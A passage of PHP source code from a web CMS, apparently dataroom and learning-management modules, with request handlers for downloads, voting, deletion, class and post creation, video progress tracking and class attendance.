$values->idx, 'version' => $values->post_version->version)); } } } } if ($action == 'download') { $values->idx = Request('idx'); $values->version = Request('version'); $values->post = $this->getPost($values->idx); if ($this->checkPermission('download') == false && $values->post->midx != $this->IM->getModule('member')->getLogged()) { header("HTTP/1.1 403 Forbidden"); exit; } $values->post_version = $this->db()->select($this->table->post_version)->where('parent', $values->idx)->where('version', $values->version)->getOne(); if ($values->post_version == null) { header("HTTP/1.1 404 Not Found"); } elseif ($values->post->midx == $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('attachment')->fileDownload($values->post_version->file, false); } else { $values->purchase = $this->db()->select($this->table->purchase)->where('parent', $values->idx)->where('midx', $this->IM->getModule('member')->getLogged())->getOne(); if ($values->purchase == null) { header("HTTP/1.1 403 Forbidden"); } else { $this->db()->update($this->table->post, array('download' => $this->db()->inc()))->where('idx', $values->idx)->execute(); $this->IM->getModule('attachment')->fileDownload($values->post_version->file); } } exit; } if ($action == 'vote') { $values->type = in_array(Request('type'), array('post', 'ment')) == true ? Request('type') : 'post'; $values->idx = Request('idx'); $values->vote = in_array(Request('vote'), array('good', 'bad')) == true ? 
Request('vote') : 'good'; if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } else { $article = $this->db()->select($this->table->{$values->type})->where('idx', $values->idx)->getOne(); if ($article == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($article->midx == $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('vote/mypost'); } else { $check = $this->db()->select($this->table->history)->where('parent', $values->idx)->where('action', 'VOTE')->where('midx', $this->IM->getModule('member')->getLogged())->getOne(); if ($check == null) { $this->db()->update($this->table->{$values->type}, array($values->vote => $this->db()->inc()))->where('idx', $values->idx)->execute(); $this->db()->insert($this->table->history, array('parent' => $values->idx, 'action' => 'VOTE', 'midx' => $this->IM->getModule('member')->getLogged(), 'result' => strtoupper($values->vote), 'reg_date' => time()))->execute(); $results->success = true; $results->message = $this->getLanguage('vote/' . $values->vote); $results->liveUpdate = 'liveUpdateDataroom' . ucfirst($values->type) . ucfirst($values->vote) . 
$values->idx; $results->liveValue = number_format($values->vote + 1); } else { $results->success = false; $results->message = $this->getLanguage('vote/duplicated'); $results->result = $check->result; } } } } if ($action == 'delete') { $values->idx = Request('idx'); $values->type = Request('type'); if ($values->type == 'post') { $post = $this->getPost($values->idx); if ($post == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('post_delete') == true || $post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $this->db()->update($this->table->post, array('is_delete' => 'TRUE', 'FALSE'))->where('idx', $values->idx)->execute(); } $results->success = true; } elseif ($values->type == 'ment') { $ment = $this->getMent($values->idx); $post = $this->getPost($ment->parent); if ($ment == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('ment_delete') == true || $ment->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { if ($this->checkMentTree($values->idx) == false) { $this->db()->delete($this->table->ment)->where('idx', $values->idx)->execute(); $this->db()->delete($this->table->ment_depth)->where('idx', $values->idx)->execute(); if ($ment->source != 0) { $source = $this->getMent($ment->source); while ($source->is_delete == 'TRUE') { if ($this->checkMentTree($source->idx) == false) { $this->db()->delete($this->table->ment)->where('idx', $source->idx)->execute(); $this->db()->delete($this->table->ment_depth)->where('idx', $source->idx)->execute(); if ($source->source != 0) { $source = 
$this->getMent($source->source); } else { break; } } else { break; } } } $results->position = null; } else { $results->position = $values->idx; $this->db()->update($this->table->ment, array('is_delete' => 'TRUE', 'modify_date' => time(), 'content' => '', 'search' => ''))->where('idx', $ment->idx)->execute(); } $attachments = $this->db()->select($this->table->attachment)->where('parent', $ment->idx)->where('type', 'MENT')->get(); for ($i = 0, $loop = count($attachments); $i < $loop; $i++) { $attachments[$i] = $attachments[$i]->idx; } $this->IM->getModule('attachment')->fileDelete($attachments); $lastMent = $this->db()->select($this->table->ment)->where('parent', $ment->parent)->where('is_delete', 'FALSE')->orderBy('reg_date', 'desc')->get(); if (count($lastMent) == 0) { $this->db()->update($this->table->post, array('ment' => 0, 'last_ment' => $post->reg_date))->where('idx', $ment->parent)->execute(); $results->parent = $ment->parent; } else { if ($results->position == null) { $position = $this->db()->select($this->table->ment_depth)->where('parent', $ment->parent)->where('head', $ment->head, '<=')->where('arrange', $ment->arrange, '<')->orderBy('head', 'asc')->orderBy('arrange', 'asc')->get(); $lastPosition = array_pop($position); $results->position = $lastPosition->idx; } $this->db()->update($this->table->post, array('ment' => count($lastMent), 'last_ment' => $lastMent[0]->reg_date))->where('idx', $ment->parent)->execute(); } $this->IM->deleteArticle('dataroom', 'ment', $values->idx); $results->message = $this->getLanguage('mentDelete/success'); } } elseif ($values->type == 'answer') { $answer = $this->db()->select($this->table->answer)->where('idx', $values->idx)->getOne(); if ($answer == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('answer_delete') == true || $answer->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } else { $results->success = false; 
$results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $this->db()->delete($this->table->answer)->where('idx', $values->idx)->execute(); $attachments = $this->db()->select($this->table->attachment)->where('parent', $answer->idx)->where('type', 'ANSWER')->get(); for ($i = 0, $loop = count($attachments); $i < $loop; $i++) { $attachments[$i] = $attachments[$i]->idx; } $this->IM->getModule('attachment')->fileDelete($attachments); $this->db()->update($this->table->question, array('has_answer' => 'FALSE'))->where('idx', $answer->parent)->execute(); $results->parent = $answer->parent; $results->message = $this->getLanguage('answerDelete/success'); } } $results->type = $values->type; } $this->IM->fireEvent('afterDoProcess', 'dataroom', $action, $values, $results); return $results; }
function doProcess($action) { $results = new stdClass(); $values = new stdClass(); if ($action == 'listUrl') { $menu = Request('menu'); $page = Request('page'); $page = $this->IM->getPages($menu, $page); $oKey = Request('oKey'); $oKeyword = Request('oKeyword'); $oLabel = Request('oLabel'); $oSort = Request('oSort'); $oDirection = Request('oDirection'); $key = Request('key'); $keyword = Request('keyword'); $label = Request('label'); $sort = Request('sort'); $direction = Request('direction'); $key = Request('key'); $keyword = Request('keyword'); $p = Request('p') ? Request('p') : 1; $queryString = 'menu=' . $page->menu . '&page=' . $page->page . '&key=' . $key . '&keyword=' . $keyword . '&label=' . $label . '&sort=' . $sort . '&direction=' . $direction . '&p=' . $p; if ($oKey != $key || $oKeyword != $keyword || $oLabel != $label || $oSort != $sort || $oDirection != $direction) { $p = 1; } $default = array(); if (strlen($keyword) == 0) { $default['key'] = ''; $default['keyword'] = ''; } if ($sort == 'idx' && $direction == 'desc') { $default['sort'] = $default['direction'] = ''; } if (isset($page->context->config->label) == true && $page->context->config->label == $label) { $default['label'] = ''; } if (isset($page->context->config->category) == true && $page->context->config->category == $category) { $default['category'] = ''; } $url = $this->IM->getUrl($page->menu, $page->page, 'list', $p) . $this->IM->getQueryString($default, $queryString); $results->success = true; $results->url = $url; } if ($action == 'create') { $values->errors = array(); $values->idx = Request('idx'); $values->lid = Request('lid'); $values->menu = Request('menu'); $values->page = Request('page'); $values->title = Request('title') ? Request('title') : ($values->errors['title'] = $this->getLanguage('create/help/title/error')); $values->content = Request('content') ? 
Request('content') : ($values->errors['content'] = $this->getLanguage('create/help/content/error')); $values->type = Request('type') ? Request('type') : ($values->errors['type'] = $this->getLanguage('create/help/type/error')); $values->attend = Request('attend') ? Request('attend') : ($values->errors['attend'] = $this->getLanguage('create/help/attend/error')); $values->lms = $this->getLms($values->lid); if ($values->lms->use_label != 'NONE') { $values->labels = is_array(Request('labels')) == true ? Request('labels') : array(); if ($values->lms->use_label == 'FORCE' && count($values->labels) == 0) { $values->errors['labels'] = $this->getLanguage('create/help/labels/error'); } } else { $values->labels = array(); } if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif (empty($values->errors) == true) { $results->success = true; $mHash = new Hash(); $insert = array(); $insert['lid'] = $values->lid; $insert['title'] = $values->title; $insert['content'] = $values->content; if ($values->idx == null) { $class = null; $reg_date = time(); $insert['midx'] = $this->IM->getModule('member')->getLogged(); $insert['reg_date'] = $reg_date; $insert['last_subject'] = $reg_date; $insert['ip'] = $_SERVER['REMOTE_ADDR']; $values->idx = $this->db()->insert($this->table->class, $insert)->execute(); // $this->IM->getModule('member')->sendPoint(null,$values->forum->post_point,'forum','post',array('idx'=>$values->idx)); // $this->IM->getModule('member')->addActivity(null,$values->forum->post_exp,'forum','post',array('idx'=>$values->idx)); } else { $class = $this->getClass($values->idx); $reg_date = $class->last_subject; if ($this->checkPermission('class_modify') == false && $class->midx != $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { 
$this->db()->update($this->table->class, $insert)->where('idx', $class->idx)->execute(); /* if ($post->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($post->midx,'forum','post_modify',$values->idx,array('from'=>$this->IM->getModule('member')->getLogged())); } $this->IM->getModule('member')->addActivity(null,0,'forum','post_modify',array('idx'=>$values->idx)); */ } } if ($results->success == true) { $cover = Request('cover'); if ($cover && preg_match('/^data:image/', $cover) == true) { $temp = explode(',', $cover); $type = array_shift($temp); $fileType = 'jpg'; if (preg_match('/^data:image\\/(.*?);/', $type, $match) == true) { $fileType = $match[1]; } $imageData = base64_decode(implode(',', $temp)); $tempFileName = $this->IM->getModule('attachment')->getTempPath(true) . '/' . md5($imageData); file_put_contents($tempFileName, $imageData); if ($this->IM->getModule('attachment')->createThumbnail($tempFileName, $tempFileName, 420, 560, false) == true) { if ($class == null || $class->cover == 0) { $coverIdx = $this->IM->getModule('attachment')->fileSave('cover.' . $fileType, $tempFileName, 'lms', 'cover'); } else { $coverIdx = $this->IM->getModule('attachment')->fileReplace($class->cover, 'cover.' . $fileType, $tempFileName); } $this->db()->update($this->table->class, array('cover' => $coverIdx))->where('idx', $values->idx)->execute(); } } $labels = $this->db()->select($this->table->class_label)->where('idx', $values->idx)->get(); for ($i = 0, $loop = count($labels); $i < $loop; $i++) { if (in_array($labels[$i]->label, $values->labels) == false) { $this->db()->delete($this->table->class_label)->where('idx', $values->idx)->where('label', $labels[$i]->label)->execute(); $lastClass = $this->db()->select($this->table->class_label)->where('label', $labels[$i]->label)->orderBy('reg_date', 'desc')->get(); $classnum = count($lastClass); $lastClassTime = $classnum > 0 ? 
$lastClass[0]->reg_date : 0; $this->db()->update($this->table->label, array('classnum' => $classnum, 'last_class' => $lastClassTime))->where('idx', $labels[$i]->label)->execute(); } } if (count($values->labels) > 0) { for ($i = 0, $loop = count($values->labels); $i < $loop; $i++) { if ($this->db()->select($this->table->class_label)->where('idx', $values->idx)->where('label', $values->labels[$i])->count() == 0) { $this->db()->insert($this->table->class_label, array('idx' => $values->idx, 'label' => $values->labels[$i], 'reg_date' => $reg_date))->execute(); $lastClass = $this->db()->select($this->table->class_label)->where('label', $values->labels[$i])->orderBy('reg_date', 'desc')->get(); $classnum = count($lastClass); $lastClassTime = $classnum > 0 ? $lastClass[0]->reg_date : 0; $this->db()->update($this->table->label, array('classnum' => $classnum, 'last_class' => $lastClassTime))->where('idx', $values->labels[$i])->execute(); } } } $lastClass = $this->db()->select($this->table->class)->where('lid', $values->lid)->orderBy('last_subject', 'desc')->get(); $classnum = count($lastClass); $lastClassTime = $classnum > 0 ? 
$lastClass[0]->last_subject : 0; $this->db()->update($this->table->lms, array('classnum' => $classnum, 'last_class' => $lastClassTime))->where('lid', $values->lid)->execute(); $page = $this->IM->getPages($values->menu, $values->page); if ($page->context->config == null) { $results->redirect = $this->IM->getUrl($values->menu, $values->page, 'class', $values->idx); } elseif (in_array($page->context->config->label, $values->labels) == true) { $results->redirect = $this->IM->getUrl($values->menu, $values->page, 'class', $values->idx); } else { $redirectPage = $this->getPostPage($values->idx); $results->redirect = $this->IM->getUrl($redirectPage->menu, $redirectPage->page, 'class', $values->idx); } } } else { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'postSubject') { $values->type = Request('type'); $values->parent = Request('parent'); $class = $this->getClass($values->parent); if ($values->type == 'add' || $values->type == 'modify') { if ($class == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($this->checkPermission('add_subject') == true || $class->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->modalHtml = $this->getPostSubjectModal($values->parent); } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } else { $values->errors = array(); $values->title = Request('title') ? 
Request('title') : ($values->errors['title'] = $this->getLanguage('addSubject/help/title/error')); if ($class == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif (count($values->errors) == 0) { $results->success = true; $sort = $this->db()->select($this->table->subject)->where('parent', $values->parent)->orderBy('sort', 'desc')->getOne(); $sort = $sort == null ? 0 : $sort->sort + 1; $this->db()->insert($this->table->subject, array('lid' => $class->lid, 'parent' => $values->parent, 'midx' => $this->IM->getModule('member')->getLogged(), 'title' => $values->title, 'reg_date' => time(), 'sort' => $sort))->execute(); $lastSubject = $this->db()->select($this->table->subject)->where('parent', $values->parent)->orderBy('reg_date', 'desc')->get(); $subject = count($lastSubject); $lastSubjectTime = $subject > 0 ? 
$lastSubject[0]->reg_date : 0; $this->db()->update($this->table->class, array('last_subject' => $lastSubjectTime, 'subject' => $subject))->where('idx', $values->parent)->execute(); } else { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } } if ($action == 'getConfig') { $values->type = Request('type'); $values->idx = Request('idx'); if ($values->type == 'post') { $post = $this->getPost($values->idx); $class = $this->getClass($post->class); } else { $subject = $this->getSubject($values->idx); $class = $this->getClass($subject->parent); } if ($class->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; if ($values->type == 'post') { $results->posts = array(); $posts = $this->db()->select($this->table->post)->where('parent', $post->parent)->orderBy('sort', 'asc')->get(); for ($i = 0, $loop = count($posts); $i < $loop; $i++) { if ($posts[$i]->idx == $values->idx) { continue; } $results->posts[] = array('idx' => $posts[$i]->idx, 'title' => $posts[$i]->title); } } $results->subjects = array(); $subjects = $this->db()->select($this->table->subject)->where('parent', $class->idx)->orderBy('sort', 'asc')->get(); for ($i = 0, $loop = count($subjects); $i < $loop; $i++) { if ($values->type == 'post' && $post->parent == $subjects[$i]->idx) { continue; } $results->subjects[] = array('idx' => $subjects[$i]->idx, 'title' => $subjects[$i]->title); } } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'getPostContext') { $values->idx = Request('idx'); $values->post = $this->getPost($values->idx); $values->attend = $this->getAttend($values->post->class); if ($values->post != null) { $results->success = true; $results->context = json_decode($values->post->context); if ($values->attend->mode == "P") { $trackings = $this->db()->select($this->table->tracking)->where('pidx', $values->idx)->get(); $results->tracking = new 
stdClass(); $results->tracking->last_position = 0; $results->tracking->tracking = array(); for ($i = 0; $i < $results->context->time; $i++) { $results->tracking->tracking[$i] = 0; } foreach ($trackings as $tracking) { for ($i = 0; $i < $results->context->time; $i++) { $count = base_convert(substr($tracking->tracking, $i, 1), 32, 10); $results->tracking->tracking[$i] += $count; } } } else { $results->tracking = $this->db()->select($this->table->tracking)->where('midx', $this->IM->getModule('member')->getLogged())->where('pidx', $values->idx)->getOne(); if ($results->tracking == null) { $results->tracking = new stdClass(); $results->tracking->last_position = 0; $results->tracking->type = $values->post->type; if ($values->post->type == 'youtube' || $values->post->type == 'video') { $results->tracking->tracking = 'T' . str_pad('', $results->context->time, '0'); } } else { if ($values->post->type == 'youtube' || $values->post->type == 'video') { $results->tracking->tracking = 'T' . $results->tracking->tracking; } } } } else { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } } if ($action == 'tracking') { $values->pidx = Request('pidx'); $values->post = $this->getPost($values->pidx); $values->midx = $this->IM->getModule('member')->getLogged(); $values->last_position = Request('last_position'); if ($values->post->type == 'youtube') { $context = json_decode($values->post->context); $values->tracking = substr(Request('tracking'), 1); if (strlen($values->tracking) != $context->time) { $values->tracking = str_pad(substr($values->tracking, 0, $context->time), $context->time, STR_PAD_RIGHT); } $values->percent = round(($context->time - substr_count($values->tracking, '0')) / $context->time * 100); } if ($this->db()->select($this->table->tracking)->where('midx', $values->midx)->where('pidx', $values->pidx)->count() == 0) { $this->db()->insert($this->table->tracking, array('midx' => $values->midx, 'pidx' => $values->pidx, 'tracking' => 
$values->tracking, 'percent' => $values->percent, 'last_position' => $values->last_position, 'reg_date' => time(), 'update_date' => time()))->execute(); } else { $this->db()->update($this->table->tracking, array('tracking' => $values->tracking, 'percent' => $values->percent, 'last_position' => $values->last_position, 'update_date' => time()))->where('midx', $values->midx)->where('pidx', $values->pidx)->execute(); } $results->success = true; } if ($action == 'addItem') { $values->parent = Request('parent'); $subject = $this->getSubject($values->parent); if ($subject == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($this->checkPermission('add_item') == true || $subject->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->modalHtml = $this->getAddItemModal($values->parent); } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'postWrite') { $values->errors = array(); $values->lid = Request('lid'); $values->idx = Request('idx'); $values->parent = Request('parent'); $values->subject = $this->getSubject($values->parent); $values->lms = $this->getLms($values->lid); $values->type = Request('type'); $values->menu = Request('menu'); $values->page = Request('page'); $values->title = Request('title') ? Request('title') : ($values->errors['title'] = $this->getLanguage('postWrite/help/title/error')); $values->content = Request('content') ? Request('content') : ($values->errors['content'] = $this->getLanguage('postWrite/help/content/error')); $values->context = new stdClass(); $values->progress_check = Request('progress_check') ? 'TRUE' : 'FALSE'; $values->attachments = is_array(Request('attachments')) == true ? 
Request('attachments') : array(); for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { $values->attachments[$i] = Decoder($values->attachments[$i]); } $values->content = $this->encodeContent($values->content, $values->attachments); if ($values->type == 'youtube') { $values->context->id = Request('id') ? Request('id') : ($values->errors['url'] = $this->getLanguage('youtube/help/url/error')); $values->context->thumbnail = Request('thumbnail'); $values->context->afk_check = Request('afk_check') ? true : false; if ($values->context->afk_check == true) { $values->context->afk_check_time = preg_match('/^[1-9]+[0-9]*$/', Request('afk_check_time')) == true && Request('afk_check_time') >= 60 ? Request('afk_check_time') : ($values->errors['afk_check_time'] = $this->getLanguage('youtube/help/afk_check_time/error')); } else { $values->context->afk_check_time = 0; } if (preg_match('/^PT(([0-9]+)H)?(([0-9]+)M)?(([0-9]+)S)?$/', Request('time'), $time) == true) { $values->context->time = $time[2] * 3600 + $time[4] * 60 + $time[6]; } else { $values->context->time = -1; } $values->context->caption = Request('caption') == "true"; } if ($values->type == 'video') { $values->context->id = Request('id') ? Request('id') : ($values->errors['file'] = $this->getLanguage('video/help/file/error')); $values->context->privacy = Request('privacy'); $values->context->afk_check = Request('afk_check') ? true : false; if ($values->context->afk_check == true) { $values->context->afk_check_time = preg_match('/^[1-9]+[0-9]*$/', Request('afk_check_time')) == true && Request('afk_check_time') >= 60 ? 
Request('afk_check_time') : ($values->errors['afk_check_time'] = $this->getLanguage('youtube/help/afk_check_time/error')); } else { $values->context->afk_check_time = 0; } } $values->context = json_encode($values->context); if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif (empty($values->errors) == true) { $results->success = true; $mHash = new Hash(); $insert = array(); $insert['lid'] = $values->lid; $insert['class'] = $values->subject->parent; $insert['parent'] = $values->parent; $insert['type'] = $values->type; $insert['title'] = $values->title; $insert['content'] = $values->content; $insert['search'] = GetString($values->content, 'index'); $insert['context'] = $values->context; $insert['progress_check'] = $values->progress_check; $insert['reg_date'] = time(); if ($values->idx == null) { $post = null; $sort = $this->db()->select($this->table->post)->where('parent', $values->parent)->orderBy('sort', 'desc')->getOne(); $sort = $sort == null ? 
0 : $sort->sort + 1; $insert['sort'] = $sort; $insert['midx'] = $this->IM->getModule('member')->getLogged(); $values->idx = $this->db()->insert($this->table->post, $insert)->execute(); // $this->IM->getModule('member')->sendPoint(null,$values->forum->post_point,'forum','post',array('idx'=>$values->idx)); // $this->IM->getModule('member')->addActivity(null,$values->forum->post_exp,'forum','post',array('idx'=>$values->idx)); } else { $post = $this->getPost($values->idx); $reg_date = $post->last_ment; if ($this->checkPermission('post_modify') == false && $post->midx != $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $this->db()->update($this->table->post, $insert)->where('idx', $post->idx)->execute(); if ($post->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($post->midx, 'forum', 'post_modify', $values->idx, array('from' => $this->IM->getModule('member')->getLogged())); } $this->IM->getModule('member')->addActivity(null, 0, 'forum', 'post_modify', array('idx' => $values->idx)); } } if ($results->success == true) { for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) { $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'lid' => $values->lid, 'type' => 'POST', 'parent' => $values->idx))->execute(); } } $results->redirect = $this->IM->getUrl($values->menu, $values->page, 'class', $values->subject->parent); } } else { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'postView') { $values->idx = Request('idx'); $values->post = $this->getPost($values->idx); $attend = $this->getAttend($values->post->class); if ($this->IM->getModule('member')->isLogged() == false) { 
$results->success = false; $results->message = $this->getLanguage('error/notLogged'); } else { if ($attend == null) { $results->success = true; $results->modalHtml = $this->getAttendClassModal($values->post->class, $values->idx); } else { if ($attend->status == 'ACTIVE') { $page = $this->getClassPage($values->post->class); $results->success = true; $results->redirect = $this->IM->getUrl($page->menu, $page->page, 'view', $values->idx); } else { $results->success = false; // To Do : Message } } } } if ($action == 'postModify') { $values->idx = Request('idx'); $post = $this->getPost($values->idx); if ($post == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('post_modify') == true || $post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->permission = true; } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'postDelete') { $values->idx = Request('idx'); $post = $this->getPost($values->idx); if ($post == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('post_delete') == true || $post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->modalHtml = $this->getDelete('post', $values->idx); } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'attendClass') { $values->idx = Request('idx'); $values->class = $this->getClass($values->idx); $values->post = Request('post'); $attend = $this->getAttend($values->class->idx); if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } else { if ($attend == null) { $results->success = true; $status = 'ACTIVE'; $this->db()->insert($this->table->attend, array('midx' => 
$this->IM->getModule('member')->getLogged(), 'class' => $values->class->idx, 'reg_date' => time(), 'status' => $status))->execute(); $student = $this->db()->select($this->table->attend)->where('class', $values->class->idx)->where('status', 'ACTIVE')->count(); $this->db()->update($this->table->class, array('student' => $student))->where('idx', $values->class->idx)->execute(); if ($values->post != null) { $results->post = $values->post; } else { $page = $this->getClassPage($values->idx); $results->redirect = $this->IM->getUrl($page->menu, $page->page, 'class', $values->idx); } } else { if ($attend->mode == 'P') { $results->success = false; $results->message = $this->getLanguage('error/attendMyClass'); } else { $results->success = false; // $results->message = $this->getLanguage('error/attendMyClass'); } } } } if ($action == 'mentWrite') { $values->errors = array(); $values->idx = Request('idx'); $values->fromidx = Request('fromidx') ? Request('fromidx') : 0; $values->parent = Request('parent'); $values->post = $this->getPost($values->parent); $values->lms = $this->getLms($values->post->lid); $values->content = Request('content') ? Request('content') : ($values->errors['content'] = $this->getLanguage('mentWrite/help/content/error')); $values->position = is_numeric(Request('position')) == true ? 
Request('position') : 0; $results->success = true; if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($results->success == true && empty($values->errors) == true) { $mHash = new Hash(); $insert = array(); $insert['lid'] = $values->post->lid; $insert['parent'] = $values->parent; $insert['fromidx'] = $values->fromidx; $insert['midx'] = $this->IM->getModule('member')->getLogged(); $insert['content'] = $values->content; $insert['position'] = $values->position; if ($values->idx == null) { $insert['reg_date'] = time(); $insert['ip'] = $_SERVER['REMOTE_ADDR']; $values->idx = $this->db()->insert($this->table->ment, $insert)->execute(); if ($values->post->midx != $this->IM->getModule('member')->getLogged()) { // $this->IM->getModule('push')->sendPush($values->post->midx,'forum','ment',$values->post->idx,array('idx'=>$values->idx,'from'=>$this->IM->getModule('member')->getLogged())); } // if ($source != 0 && $sourceData->midx != $this->IM->getModule('member')->getLogged()) { // $this->IM->getModule('push')->sendPush($sourceData->midx,'forum','replyment',$values->post->idx,array('idx'=>$values->idx,'from'=>$this->IM->getModule('member')->getLogged())); // } // $this->IM->getModule('member')->sendPoint(null,$values->forum->ment_point,'forum','ment',array('idx'=>$values->idx)); // $this->IM->getModule('member')->addActivity(null,$values->forum->ment_exp,'forum','ment',array('idx'=>$values->idx)); } else { /* $ment = $this->getMent($values->idx); if ($this->checkPermission('ment_modify') == false && ($ment->midx != 0 && $ment->midx != $this->IM->getModule('member')->getLogged())) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif ($ment->midx == 0) { if ($mHash->password_validate($values->password,$ment->password) == false) { $results->success = false; $results->errors = 
array('password'=>$this->getLanguage('error/incorrectPassword')); $results->message = $this->getLanguage('error/incorrectPassword'); } } if ($results->success == true) { if ($this->IM->getModule('member')->isLogged() == false) { $insert['name'] = $values->name; $insert['password'] = $values->password ? $mHash->password_hash($values->password) : ''; $insert['email'] = $values->email; $insert['ip'] = $_SERVER['REMOTE_ADDR']; } $insert['modify_date'] = time(); $this->db()->update($this->table->ment,$insert)->where('idx',$ment->idx)->execute(); if ($ment->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($ment->midx,'forum','ment_modify',$values->idx,array('from'=>$this->IM->getModule('member')->getLogged())); } $this->IM->getModule('member')->addActivity(null,0,'forum','ment',array('idx'=>$values->idx)); } */ } if ($results->success == true) { $lastMent = $this->db()->select($this->table->ment)->where('parent', $values->parent)->where('is_delete', 'FALSE')->orderBy('reg_date', 'desc')->get(); $mentnum = count($lastMent); $lastMentTime = $mentnum > 0 ? 
$lastMent[0]->reg_date : $values->post->reg_date; $this->db()->update($this->table->post, array('ment' => $mentnum, 'last_ment' => $lastMentTime))->where('idx', $values->parent)->execute(); // $this->IM->setArticle('forum',$values->post->lid,'post',$values->parent,time()); // $this->IM->setArticle('forum',$values->post->lid,'ment',$values->idx,time()); $results->message = $this->getLanguage('mentWrite/success'); $results->idx = $values->idx; $results->parent = $values->parent; } } elseif (count($values->errors) > 0) { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'mentModify') { $values->idx = Request('idx'); $ment = $this->getMent($values->idx); if ($ment == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('ment_modify') == true || $ment->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $ment->content = $this->getArticleContent($ment->content); $attachments = $this->db()->select($this->table->attachment)->where('parent', $ment->idx)->where('type', 'MENT')->get(); for ($i = 0, $loop = count($attachments); $i < $loop; $i++) { $attachments[$i] = $attachments[$i]->idx; } $ment->attachment = Encoder(json_encode($attachments)); $results->data = $ment; } } if ($action == 'vote') { $values->idx = Request('idx'); $values->vote = in_array(Request('vote'), array('good', 'bad')) == true ? 
Request('vote') : 'good'; if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } else { $values->post = $this->getPost($values->idx); if ($values->post == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($values->post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('vote/mypost'); } else { $values->forum = $this->getLms($values->post->lid); $check = $this->db()->select($this->table->history)->where('parent', $values->idx)->where('action', 'VOTE')->where('midx', $this->IM->getModule('member')->getLogged())->getOne(); if ($check == null) { if ($values->vote == 'good') { $this->db()->update($this->table->post, array('vote' => $this->db()->inc()))->where('idx', $values->idx)->execute(); } else { $this->db()->update($this->table->post, array('vote' => $this->db()->dec()))->where('idx', $values->idx)->execute(); } $this->db()->insert($this->table->history, array('type' => 'POST', 'parent' => $values->idx, 'action' => 'VOTE', 'midx' => $this->IM->getModule('member')->getLogged(), 'result' => strtoupper($values->vote), 'reg_date' => time()))->execute(); $results->success = true; $results->message = $this->getLanguage('vote/' . $values->vote); $results->liveUpdate = 'liveUpdateLmsVote' . $values->idx; $results->liveValue = number_format($values->vote == 'good' ? $values->post->vote + 1 : $values->post->vote - 1); $this->IM->getModule('member')->sendPoint(null, $values->forum->vote_point, 'forum', 'post_' . $values->vote, array('idx' => $values->idx)); $this->IM->getModule('member')->addActivity(null, 